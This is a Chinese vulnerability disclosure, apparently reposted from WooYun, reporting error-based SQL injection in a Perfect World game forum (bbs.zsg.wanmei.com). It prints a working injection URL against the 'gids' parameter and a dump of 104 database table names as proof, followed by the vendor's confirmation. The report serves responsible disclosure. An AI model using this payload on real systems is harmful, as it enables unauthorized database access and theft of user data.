完美世界某站SQL注入漏洞

admin 2015年4月18日14:59:17评论510 views字数 2984阅读9分56秒阅读模式
摘要

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-17: 细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2014-67036

漏洞标题: 完美世界某站SQL注入漏洞

相关厂商: 完美时空

漏洞作者: 华不再扬

提交时间: 2014-07-03 18:51

公开时间: 2014-08-17 18:52

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-17: 细节向公众公开

简要描述:

报错注入

详细说明:

完美世界某站SQL注入漏洞

http://bbs.zsg.wanmei.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23

http://bbs.ms.wanmei.com 同样注入

漏洞证明:

Database: bbszsg

[104 tables]

+---------------------------+

| `[Table]access` |

| `[Table]activities` |

| `[Table]activityapplies` |

| `[Table]addons` |

| `[Table]adminactions` |

| `[Table]admincustom` |

| `[Table]admingroups` |

| `[Table]adminnotes` |

| `[Table]adminsessions` |

| `[Table]advertisements` |

| `[Table]announcements` |

| `[Table]attachmentfields` |

| `[Table]attachments` |

| `[Table]attachpaymentlog` |

| `[Table]attachtypes` |

| `[Table]banned` |

| `[Table]bbcodes` |

| `[Table]caches` |

| `[Table]creditslog` |

| `[Table]crons` |

| `[Table]debateposts` |

| `[Table]debates` |

| `[Table]failedlogins` |

| `[Table]faqs` |

| `[Table]favoriteforums` |

| `[Table]favorites` |

| `[Table]favoritethreads` |

| `[Table]feeds` |

| `[Table]forumfields` |

| `[Table]forumlinks` |

| `[Table]forumrecommend` |

| `[Table]forums` |

| `[Table]imagetypes` |

| `[Table]invites` |

| `[Table]itempool` |

| `[Table]magiclog` |

| `[Table]magicmarket` |

| `[Table]magics` |

| `[Table]medallog` |

| `[Table]medals` |

| `[Table]memberfields` |

| `[Table]membermagics` |

| `[Table]memberrecommend` |

| `[Table]members` |

| `[Table]memberspaces` |

| `[Table]moderators` |

| `[Table]modworks` |

| `[Table]mytasks` |

| `[Table]navs` |

| `[Table]onlinelist` |

| `[Table]onlinetime` |

| `[Table]orders` |

| `[Table]paymentlog` |

| `[Table]pluginhooks` |

| `[Table]plugins` |

| `[Table]pluginvars` |

| `[Table]polloptions` |

| `[Table]polls` |

| `[Table]postposition` |

| `[Table]posts` |

| `[Table]profilefields` |

| `[Table]projects` |

| `[Table]promotions` |

| `[Table]prompt` |

| `[Table]promptmsgs` |

| `[Table]prompttype` |

| `[Table]ranks` |

| `[Table]ratelog` |

| `[Table]regips` |

| `[Table]relatedthreads` |

| `[Table]reportlog` |

| `[Table]request` |

| `[Table]rewardlog` |

| `[Table]rsscaches` |

| `[Table]searchindex` |

| `[Table]sessions` |

| `[Table]settings` |

| `[Table]smilies` |

| `[Table]spacecaches` |

| `[Table]stats` |

| `[Table]statvars` |

| `[Table]styles` |

| `[Table]stylevars` |

| `[Table]tags` |

| `[Table]tasks` |

| `[Table]taskvars` |

| `[Table]templates` |

| `[Table]threads` |

| `[Table]threadsmod` |

| `[Table]threadtags` |

| `[Table]threadtypes` |

| `[Table]tradecomments` |

| `[Table]tradelog` |

| `[Table]tradeoptionvars` |

| `[Table]trades` |

| `[Table]typemodels` |

| `[Table]typeoptions` |

| `[Table]typeoptionvars` |

| `[Table]typevars` |

| `[Table]usergroups` |

| `[Table]validating` |

| `[Table]warnings` |

| `[Table]words` |

| editlog |

+---------------------------+

修复方案:

过滤~

版权声明:转载请注明来源 华不再扬@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-04 14:59

厂商回复:

感谢洞主对完美世界的关注,我们会尽快修补该漏洞。

最新状态:

暂无


 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

 

登陆后才能进行评分


评价

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2015年4月18日14:59:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   完美世界某站SQL注入漏洞http://cn-sec.com/archives/16428.html

发表评论

匿名网友 填写信息